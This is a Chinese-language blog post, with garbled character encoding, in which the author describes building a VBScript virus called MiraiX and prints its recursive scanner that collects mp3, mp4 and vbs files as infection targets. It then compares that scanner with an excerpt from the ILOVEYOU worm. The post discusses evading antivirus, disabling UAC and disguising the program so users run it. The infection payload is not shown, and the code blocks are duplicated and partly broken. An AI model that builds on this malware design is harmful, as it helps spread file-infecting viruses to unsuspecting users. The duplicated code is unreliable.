照慣例,先推薦一首歌給諸君。
總之,
在上次跟各位分享的具感染性的VBscript後,
我便繼續(xù)擴(kuò)充MiraiX的其他功能,
包含了一些用於掃描硬碟與檔案的自函數(shù),
試圖親自完成一個(gè)"具完整架構(gòu)"的惡意程式。
哎呀,結(jié)~果~呢~
我發(fā)現(xiàn)這一切出乎意料之外的困難的說~OwO
原先我以為,
既然我能寫出病毒部分的關(guān)鍵程式碼,
那麼將各種功能組裝起來,
肯定難不到哪裡去,
對(duì)吧? 那肯定是如此,對(duì)吧?
但~是~呢~ 我發(fā)現(xiàn)組裝才是真正的難處所在。
該如何正確地組裝,分段執(zhí)行各項(xiàng)功能,
才能有效的規(guī)避防毒軟體(AV)的掃瞄?
又該如何偽裝或掩護(hù)惡意軟體的主程式,
能夠讓使用者在不經(jīng)意之間執(zhí)行到病毒?
以上這一切關(guān)鍵技術(shù),
都是在組裝病毒時(shí)我所遇到的瓶頸。
之後我去查了很多資料,
以研究電腦病毒所需具備的架構(gòu)與相關(guān)概念。
首先,病毒可以在架構(gòu)上分成兩塊主體:
1. search routine (檔案掃描的週期與設(shè)計(jì))
2. self-replication (自我複製與檔案感染)
Search routine 的搜尋演算法與完整性,
會(huì)影響到self-replication感染的檔案數(shù)量,
與病毒所能感染的層面,速度以及深度。
其中,self-replication的程式碼愈是精簡(jiǎn),
被AV檢測(cè)出的機(jī)率則越低,
但同時(shí)也會(huì)被限制於只能感染單一類型的檔案,
使得感染的層面受限。
而 self-replication 通常會(huì)附帶反偵測(cè)的機(jī)制,
包含關(guān)閉/攻擊防毒軟體、關(guān)閉UAC、偽裝。
真的是超酷的的說,
辣ㄍ完整性,簡(jiǎn)直就像一隻小生物一樣。
至於其餘的細(xì)節(jié),請(qǐng)參考虛鹿的筆記:
這邊就當(dāng)作是附錄
順便跟各位分享一下MiraiX掃描檔案的設(shè)計(jì),
讓對(duì)病毒開發(fā)有興趣的ㄉ巴友能夠參考看看。
[#]MiraiX掃描檔案程式碼節(jié)錄:
Rem MiraiX Ver0.1.0(VBScript Ver.)
Rem Coded by Falsedeer(虛鹿) in 2022/1/27
'On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
Rem Coded by Falsedeer(虛鹿) in 2022/1/27
'On Error Resume Next
Set fso = CreateObject("Scripting.FileSystemObject")
'target file-ext for infection 目標(biāo)的感染檔案
Dim tgt_ext:tgt_ext = Array("mp3","mp4","vbs")
Dim runway:runway = Array()'holding valid file with certain ext 用來裝目標(biāo)檔案的陣列
Dim tgt_ext:tgt_ext = Array("mp3","mp4","vbs")
Dim runway:runway = Array()'holding valid file with certain ext 用來裝目標(biāo)檔案的陣列
Function AddItem(arr,val)'handle array additem 處理陣列加入新的物件
ReDim Preserve arr(UBound(arr)+1)
arr(UBound(arr)) = val
AddItem = arr
End Function
Function scandisk(path)'scanning all files/folders under certain path,looking for certain file-ext 掃苗主程式
For Each file In scanfile(path)'file
Dim ext
ext = fso.GetExtensionName(file)
ext = LCase(ext)
For Each y In tgt_ext
If StrComp(ext,y,1) = 0 Then
runway = AddItem(runway,file)
EndIf
Next
Next
For Each folder In scanfolder(path)'folder
scandisk(folder)
Next
End Function
Function scanfile(folder_)'scan files of selected path, return array 掃描檔案回傳陣列
Dim file:file = Array()'create array for files 裝回傳的檔案的陣列
Set fhandler = fso.GetFolder(folder_)
Set files = fhandler.Files
For Each file_ In files
file = AddItem(file,file_)
Next
scanfile =file
End Function
Function scanfolder(folder_)'scan subfolders of selected path, return array 掃描子資料夾
Dim folder:folder = Array()'create array for folders 裝回傳子資料夾的陣列
Set fhandler = fso.GetFolder(folder_)
Set folders = fhandler.SubFolders
For Each folder_ in folders
folder = AddItem(folder,folder_)
Next
scanfolder = folder
End Function
ReDim Preserve arr(UBound(arr)+1)
arr(UBound(arr)) = val
AddItem = arr
End Function
Function scandisk(path)'scanning all files/folders under certain path,looking for certain file-ext 掃苗主程式
For Each file In scanfile(path)'file
Dim ext
ext = fso.GetExtensionName(file)
ext = LCase(ext)
For Each y In tgt_ext
If StrComp(ext,y,1) = 0 Then
runway = AddItem(runway,file)
EndIf
Next
Next
For Each folder In scanfolder(path)'folder
scandisk(folder)
Next
End Function
Function scanfile(folder_)'scan files of selected path, return array 掃描檔案回傳陣列
Dim file:file = Array()'create array for files 裝回傳的檔案的陣列
Set fhandler = fso.GetFolder(folder_)
Set files = fhandler.Files
For Each file_ In files
file = AddItem(file,file_)
Next
scanfile =file
End Function
Function scanfolder(folder_)'scan subfolders of selected path, return array 掃描子資料夾
Dim folder:folder = Array()'create array for folders 裝回傳子資料夾的陣列
Set fhandler = fso.GetFolder(folder_)
Set folders = fhandler.SubFolders
For Each folder_ in folders
folder = AddItem(folder,folder_)
Next
scanfolder = folder
End Function
如過想要掃描特定的磁碟,
就能夠用 call scandisk("C:\") ,
把欲感染的目標(biāo)檔案裝入runway()陣列之中。
我原本的想法是想把各個(gè)功能模組化,
以便程式未來的利用與改寫。
UMU!!
接著,讓我們來看看著名的愛蟲(VBS病毒),
掃描檔案所用的程式碼。
[#]愛蟲的程式碼節(jié)錄:
Set fso = CreateObject(”Scripting.FileSystemObject")
sub scan(folder_)
On Error Resume Next
set folder_ = fso.getfolder(folder_)
set files = folder_.files
for each file in files
On Error Resume Next
set folder_ = fso.getfolder(folder_)
set files = folder_.files
for each file in files
ext = fso.GetExtensionName(file)
ext = lcase(ext)
if ext = ”mp5″ then
‘~感染檔案的程式碼~
end if
next
set subfolders = folder_.subfolders
for each subfolder in subfolders
scan()
scan(subfolder)
next
end sub
ext = lcase(ext)
if ext = ”mp5″ then
‘~感染檔案的程式碼~
end if
next
set subfolders = folder_.subfolders
for each subfolder in subfolders
scan()
scan(subfolder)
next
end sub
哭啊,∑(?Д?)
還真的是簡(jiǎn)潔有力的說……
難道這就是所謂的實(shí)力上的差距ㄇ? QAQ
達(dá)人
